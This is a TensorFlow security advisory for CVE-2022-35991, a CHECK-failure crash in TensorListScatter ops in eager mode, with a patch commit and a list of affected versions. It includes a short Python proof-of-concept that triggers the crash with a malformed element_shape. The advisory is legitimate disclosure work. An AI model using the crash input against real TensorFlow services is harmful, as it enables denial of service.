## TFSA-2022-169: `CHECK` fail in `TensorListScatter` and `TensorListScatterV2` in eager mode

### CVE Number
CVE-2022-35991

### Impact
Another instance of CVE-2022-35991, where `TensorListScatter` and `TensorListScatterV2` crash via non scalar inputs in`element_shape`, was found in eager mode and fixed.
```python
import tensorflow as tf
arg_0=tf.random.uniform(shape=(2, 2, 2), dtype=tf.float16, maxval=None)
arg_1=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)
arg_2=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)
arg_3=''
tf.raw_ops.TensorListScatter(tensor=arg_0, indices=arg_1, 
element_shape=arg_2, name=arg_3)
```

### Patches
We have patched the issue in GitHub commit [bf9932fc907aff0e9e8cccf769e8b00d30fd81a1](https://github.com/tensorflow/tensorflow/commit/bf9932fc907aff0e9e8cccf769e8b00d30fd81a1).

The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by Pattarakrit Rattankul

